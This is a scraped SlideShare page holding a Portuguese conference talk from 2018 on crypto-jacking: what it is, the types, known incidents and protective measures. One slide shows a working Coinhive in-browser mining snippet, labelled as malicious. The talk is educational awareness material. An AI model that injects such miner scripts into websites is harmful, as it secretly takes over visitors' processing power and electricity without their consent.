SlideShare uma empresa Scribd logo
A Nova Era do
Pedro Tavares <sirpedrotavares@gmail.com>
https://seguranca-informatica.pt
21 de março de 2018
ll Jornadas de InfoWeb
Agenda
● A Importância da Cibersegurança
● O que é Crypto-jacking
● Cryptocurrency - The Inception
● Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “ In-the-Wild ”
● Anúncios versus Crypto-mining
● Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Importância da Cibersegurança
Preocupações em 2018
● Internet of Thing (IoT)
● Mobile
● Inteligência Artificial
● Sistemas descentralizados (blockchain)
● Crypto-jacking
● (...)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Meios e tecnologias para proteçãoCibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking Crypto-mining
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
O que é Crypto-jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking acontece quando o mining é feito de forma ilegal, i.e.,
sem consentimento e conhecimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cryptocurrency - The Inception
[1] “Security without Identification: Transaction Systems to Make Big Brother Obsolete"
https://www.cs.ru.nl/~jhh/pub/secsem/chaum1985bigbrother.pdf
[2] Cyberpunks e outras propostas de moedas criptográficas: https://www.coindesk.com/the-rise-of-the-cypherpunks/
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cryptocurrency - The Inception
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cryptocurrency - The Inception
Criptomoedas tornaram-se uma nova tendência
● Bitcoin
● Ether
● Litecoin
● NEM
● Monero
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Tipos de Crypto-jacking
● Crypto-jacking em Páginas Web
● Crypto-jacking em Redes Wi-Fi
● Crypto-jacking “in-the-wild”
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking em Páginas Web
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
<script src=”https://coin-hive.com/lib/coinhive.min.js“></script>
<script>
var miner = new CoinHive.Anonymous(‘YOUR_TOKEN’);//Monero ID
miner.start();
</script>
Código malicioso de mineração
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking em redes Wi-Fi
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Crypto-jacking “ In-the-Wild “
Para todo o tipo de gostos :)
● SQL Injection
● XSS + Social Engineering
● Malware
○ Dofoil (infetou mais de 500.000 computadores Windows)
○ PyCryptoMiner - SSH (dropper instala bot para minerar criptomedas)
○ Tesla Cloud — Ciber atacantes usaram processamento na Cloud
○ Plugins CMS infetados (Browsealoud, etc.)
■ Crypto-jacking em websites (Los Angels Times, Dinheiro Vivo, CR7)
○ Software e extensões com crypto-miners (Jenkins, ApacheCouchDB,
Archive Poster - extensão Google Chrome)
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Anúncios versus Crypto-mining jacking
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Motivação - Obter dinheiro fácil através da capacidade de processamento e
eletricidade de terceiros (crypto-mining => jacking
Crypto-mining jacking
Problemas:
- Pouco retorno (1k visits - 55 sec - €0.36)
- Desempenho (website, browser, PC, Internet)
- Notificação prévia + consentimento
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Proteção
Ponto de vista:
Utilizador
● Opera lançou módulo nativo
● Extensão Chrome: NoCoin
● AV
● Consciencialização (estar alerta) + Ação (notificar)
Infraestrutura
● Monitorização (IDS, WAFs, etc)
● Cibersegurança contínua
● Auditorias de segurança
● Consciencialização + Ação
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
Cibersegurança
Crypto-jacking
Cryptocurrency
Tipos de Crypto-jacking
Crypto-jacking na Web
Crypto-jacking na Wi-Fi
Crypto-jacking “ In-the-Wild ”
Anúncios vs. Crypto-mining
Proteção
~ «O meu grande bem-haja a todos» ~
Pedro Tavares <sirpedrotavares@gmail.com>

Mais conteúdo relacionado

Semelhante a Nova era-crypto-jacking

Quem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internetQuem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internet
Wagner Reck
 
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec Brasil
 
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
Pedro Ivo Lima
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
Bruno Wagner Gonçalves
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
Gabriel Albo
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
Bruno Wagner Gonçalves
 
Trabalho de Sistemas para internet
Trabalho de Sistemas para internetTrabalho de Sistemas para internet
Trabalho de Sistemas para internet
si03grupo1
 
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Joao Barreto Fernandes
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa
Bravo Tecnologia
 
Introducao a criptografia
Introducao a criptografiaIntroducao a criptografia
Introducao a criptografia
gillojau
 
Kriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuaisKriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuais
Lucas Feat
 
Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.
Jorge Ciriaco
 
Seguranca - básico
Seguranca - básicoSeguranca - básico
Seguranca - básico
JErickPPTs
 
Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018
PhishX
 
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaSegurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Tchelinux
 
Apresentação - Symantec
Apresentação - SymantecApresentação - Symantec
Apresentação - Symantec
Antonio Balochini
 
Seminário Web Symantec
Seminário Web SymantecSeminário Web Symantec
Seminário Web Symantec
techsoupbrasil
 
Sistema de segurança_web
Sistema de segurança_webSistema de segurança_web
Sistema de segurança_web
Favsro Fot
 
Palestra Segurança na Internet
Palestra Segurança na InternetPalestra Segurança na Internet
Palestra Segurança na Internet
jamillerodrigues
 
Criptografia em segurança da informação
Criptografia em segurança da informaçãoCriptografia em segurança da informação
Criptografia em segurança da informação
Ewerton Almeida
 

Semelhante a Nova era-crypto-jacking (20)

Quem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internetQuem vigia os vigilantes: Liberdade vs Controle na internet
Quem vigia os vigilantes: Liberdade vs Controle na internet
 
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
Symantec - Inovação Hacker: de espionagem industrial por drones a estímulos m...
 
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
O aspecto humano em Cybersecurity: Como transformar as pessoas em sensores at...
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
 
Movimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadasMovimentos abertos para comunicações privadas
Movimentos abertos para comunicações privadas
 
Trabalho de Sistemas para internet
Trabalho de Sistemas para internetTrabalho de Sistemas para internet
Trabalho de Sistemas para internet
 
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
Workshop de Auditoria & Segurança - Universidade Católica Portuguesa - 5 de M...
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa
 
Introducao a criptografia
Introducao a criptografiaIntroducao a criptografia
Introducao a criptografia
 
Kriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuaisKriptacoin Apresentação das moedas virtuais
Kriptacoin Apresentação das moedas virtuais
 
Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.Apresentação kriptacoin - Conheça nosso plano de negócio.
Apresentação kriptacoin - Conheça nosso plano de negócio.
 
Seguranca - básico
Seguranca - básicoSeguranca - básico
Seguranca - básico
 
Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018Cybersecurty for People - PhishX Summit de Maio/2018
Cybersecurty for People - PhishX Summit de Maio/2018
 
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux UruguaianaSegurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
Segurança cibernética e software livre - Lourival Araujo - TchêLinux Uruguaiana
 
Apresentação - Symantec
Apresentação - SymantecApresentação - Symantec
Apresentação - Symantec
 
Seminário Web Symantec
Seminário Web SymantecSeminário Web Symantec
Seminário Web Symantec
 
Sistema de segurança_web
Sistema de segurança_webSistema de segurança_web
Sistema de segurança_web
 
Palestra Segurança na Internet
Palestra Segurança na InternetPalestra Segurança na Internet
Palestra Segurança na Internet
 
Criptografia em segurança da informação
Criptografia em segurança da informaçãoCriptografia em segurança da informação
Criptografia em segurança da informação
 

Último

the_story_garden_5_SB_with_activities.pdf
the_story_garden_5_SB_with_activities.pdfthe_story_garden_5_SB_with_activities.pdf
the_story_garden_5_SB_with_activities.pdf
CarinaSoto12
 
“A classe operária vai ao paraíso os modos de produzir e trabalhar ao longo ...
“A classe operária vai ao paraíso  os modos de produzir e trabalhar ao longo ...“A classe operária vai ao paraíso  os modos de produzir e trabalhar ao longo ...
“A classe operária vai ao paraíso os modos de produzir e trabalhar ao longo ...
AdrianoMontagna1
 
Fernão Lopes. pptx
Fernão Lopes.                       pptxFernão Lopes.                       pptx
Fernão Lopes. pptx
TomasSousa7
 
Vogais Ilustrados para alfabetização infantil
Vogais Ilustrados para alfabetização infantilVogais Ilustrados para alfabetização infantil
Vogais Ilustrados para alfabetização infantil
mamaeieby
 
.Template .padrao .slides .TCC .2024 ppt
.Template .padrao .slides .TCC .2024 ppt.Template .padrao .slides .TCC .2024 ppt
.Template .padrao .slides .TCC .2024 ppt
IslanderAndrade
 
Livro: Pedagogia do Oprimido - Paulo Freire
Livro: Pedagogia do Oprimido - Paulo FreireLivro: Pedagogia do Oprimido - Paulo Freire
Livro: Pedagogia do Oprimido - Paulo Freire
WelberMerlinCardoso
 
Slides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptx
Slides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptxSlides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptx
Slides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptx
LuizHenriquedeAlmeid6
 
BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...
BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...
BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...
Escola Municipal Jesus Cristo
 
Apresentação_Primeira_Guerra_Mundial 9 ANO-1.pptx
Apresentação_Primeira_Guerra_Mundial 9 ANO-1.pptxApresentação_Primeira_Guerra_Mundial 9 ANO-1.pptx
Apresentação_Primeira_Guerra_Mundial 9 ANO-1.pptx
JulianeMelo17
 
Rimas, Luís Vaz de Camões. pptx
Rimas, Luís Vaz de Camões.          pptxRimas, Luís Vaz de Camões.          pptx
Rimas, Luís Vaz de Camões. pptx
TomasSousa7
 
Funções e Progressões - Livro completo prisma
Funções e Progressões - Livro completo prismaFunções e Progressões - Livro completo prisma
Funções e Progressões - Livro completo prisma
djincognito
 
Slides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptx
Slides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptxSlides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptx
Slides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptx
LuizHenriquedeAlmeid6
 
UFCD_10949_Lojas e-commerce no-code_índice.pdf
UFCD_10949_Lojas e-commerce no-code_índice.pdfUFCD_10949_Lojas e-commerce no-code_índice.pdf
UFCD_10949_Lojas e-commerce no-code_índice.pdf
Manuais Formação
 
Leonardo da Vinci .pptx
Leonardo da Vinci                  .pptxLeonardo da Vinci                  .pptx
Leonardo da Vinci .pptx
TomasSousa7
 
Treinamento NR 38 - CORPO PRINCIPAL da NORMA.pptx
Treinamento NR 38 - CORPO PRINCIPAL da NORMA.pptxTreinamento NR 38 - CORPO PRINCIPAL da NORMA.pptx
Treinamento NR 38 - CORPO PRINCIPAL da NORMA.pptx
MarcosPaulo777883
 
Atividades de Inglês e Espanhol para Imprimir - Alfabetinho
Atividades de Inglês e Espanhol para Imprimir - AlfabetinhoAtividades de Inglês e Espanhol para Imprimir - Alfabetinho
Atividades de Inglês e Espanhol para Imprimir - Alfabetinho
MateusTavares54
 
educação inclusiva na atualidade como ela se estabelece atualmente
educação inclusiva na atualidade como ela se estabelece atualmenteeducação inclusiva na atualidade como ela se estabelece atualmente
educação inclusiva na atualidade como ela se estabelece atualmente
DeuzinhaAzevedo
 
O sentimento nacional brasiliero, segundo o historiador Jose Murlo de Carvalho
O sentimento nacional brasiliero, segundo o historiador Jose Murlo de CarvalhoO sentimento nacional brasiliero, segundo o historiador Jose Murlo de Carvalho
O sentimento nacional brasiliero, segundo o historiador Jose Murlo de Carvalho
analuisasesso
 
05-os-pre-socraticos sociologia-28-slides.pptx
05-os-pre-socraticos sociologia-28-slides.pptx05-os-pre-socraticos sociologia-28-slides.pptx
05-os-pre-socraticos sociologia-28-slides.pptx
ValdineyRodriguesBez1
 
0002_matematica_6ano livro de matemática
0002_matematica_6ano livro de matemática0002_matematica_6ano livro de matemática
0002_matematica_6ano livro de matemática
Giovana Gomes da Silva
 

Último (20)

the_story_garden_5_SB_with_activities.pdf
the_story_garden_5_SB_with_activities.pdfthe_story_garden_5_SB_with_activities.pdf
the_story_garden_5_SB_with_activities.pdf
 
“A classe operária vai ao paraíso os modos de produzir e trabalhar ao longo ...
“A classe operária vai ao paraíso  os modos de produzir e trabalhar ao longo ...“A classe operária vai ao paraíso  os modos de produzir e trabalhar ao longo ...
“A classe operária vai ao paraíso os modos de produzir e trabalhar ao longo ...
 
Fernão Lopes. pptx
Fernão Lopes.                       pptxFernão Lopes.                       pptx
Fernão Lopes. pptx
 
Vogais Ilustrados para alfabetização infantil
Vogais Ilustrados para alfabetização infantilVogais Ilustrados para alfabetização infantil
Vogais Ilustrados para alfabetização infantil
 
.Template .padrao .slides .TCC .2024 ppt
.Template .padrao .slides .TCC .2024 ppt.Template .padrao .slides .TCC .2024 ppt
.Template .padrao .slides .TCC .2024 ppt
 
Livro: Pedagogia do Oprimido - Paulo Freire
Livro: Pedagogia do Oprimido - Paulo FreireLivro: Pedagogia do Oprimido - Paulo Freire
Livro: Pedagogia do Oprimido - Paulo Freire
 
Slides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptx
Slides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptxSlides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptx
Slides Lição 11, CPAD, A Realidade Bíblica do Inferno, 2Tr24.pptx
 
BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...
BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...
BULLYING NÃO É AMOR.pdf LIVRO PARA TRABALHAR COM ALUNOS ATRAVÉS DE PROJETOS...
 
Apresentação_Primeira_Guerra_Mundial 9 ANO-1.pptx
Apresentação_Primeira_Guerra_Mundial 9 ANO-1.pptxApresentação_Primeira_Guerra_Mundial 9 ANO-1.pptx
Apresentação_Primeira_Guerra_Mundial 9 ANO-1.pptx
 
Rimas, Luís Vaz de Camões. pptx
Rimas, Luís Vaz de Camões.          pptxRimas, Luís Vaz de Camões.          pptx
Rimas, Luís Vaz de Camões. pptx
 
Funções e Progressões - Livro completo prisma
Funções e Progressões - Livro completo prismaFunções e Progressões - Livro completo prisma
Funções e Progressões - Livro completo prisma
 
Slides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptx
Slides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptxSlides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptx
Slides Lição 9, Betel, Ordenança para uma vida de santificação, 2Tr24.pptx
 
UFCD_10949_Lojas e-commerce no-code_índice.pdf
UFCD_10949_Lojas e-commerce no-code_índice.pdfUFCD_10949_Lojas e-commerce no-code_índice.pdf
UFCD_10949_Lojas e-commerce no-code_índice.pdf
 
Leonardo da Vinci .pptx
Leonardo da Vinci                  .pptxLeonardo da Vinci                  .pptx
Leonardo da Vinci .pptx
 
Treinamento NR 38 - CORPO PRINCIPAL da NORMA.pptx
Treinamento NR 38 - CORPO PRINCIPAL da NORMA.pptxTreinamento NR 38 - CORPO PRINCIPAL da NORMA.pptx
Treinamento NR 38 - CORPO PRINCIPAL da NORMA.pptx
 
Atividades de Inglês e Espanhol para Imprimir - Alfabetinho
Atividades de Inglês e Espanhol para Imprimir - AlfabetinhoAtividades de Inglês e Espanhol para Imprimir - Alfabetinho
Atividades de Inglês e Espanhol para Imprimir - Alfabetinho
 
educação inclusiva na atualidade como ela se estabelece atualmente
educação inclusiva na atualidade como ela se estabelece atualmenteeducação inclusiva na atualidade como ela se estabelece atualmente
educação inclusiva na atualidade como ela se estabelece atualmente
 
O sentimento nacional brasiliero, segundo o historiador Jose Murlo de Carvalho
O sentimento nacional brasiliero, segundo o historiador Jose Murlo de CarvalhoO sentimento nacional brasiliero, segundo o historiador Jose Murlo de Carvalho
O sentimento nacional brasiliero, segundo o historiador Jose Murlo de Carvalho
 
05-os-pre-socraticos sociologia-28-slides.pptx
05-os-pre-socraticos sociologia-28-slides.pptx05-os-pre-socraticos sociologia-28-slides.pptx
05-os-pre-socraticos sociologia-28-slides.pptx
 
0002_matematica_6ano livro de matemática
0002_matematica_6ano livro de matemática0002_matematica_6ano livro de matemática
0002_matematica_6ano livro de matemática
 

Nova era-crypto-jacking

  • 1. A Nova Era do Pedro Tavares <sirpedrotavares@gmail.com> https://seguranca-informatica.pt 21 de março de 2018 ll Jornadas de InfoWeb
  • 2. Agenda ● A Importância da Cibersegurança ● O que é Crypto-jacking ● Cryptocurrency - The Inception ● Tipos de Crypto-jacking ● Crypto-jacking em Páginas Web ● Crypto-jacking em Redes Wi-Fi ● Crypto-jacking “ In-the-Wild ” ● Anúncios versus Crypto-mining ● Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 3. Importância da Cibersegurança Preocupações em 2018 ● Internet of Thing (IoT) ● Mobile ● Inteligência Artificial ● Sistemas descentralizados (blockchain) ● Crypto-jacking ● (...) Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Meios e tecnologias para proteçãoCibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 4. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 5. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Crypto-jacking Crypto-mining Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
  • 6. O que é Crypto-jacking Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção Crypto-jacking acontece quando o mining é feito de forma ilegal, i.e., sem consentimento e conhecimento Cibersegurança Crypto-jacking Cryptocurrency Tipos de Crypto-jacking Crypto-jacking na Web Crypto-jacking na Wi-Fi Crypto-jacking “ In-the-Wild ” Anúncios vs. Crypto-mining Proteção
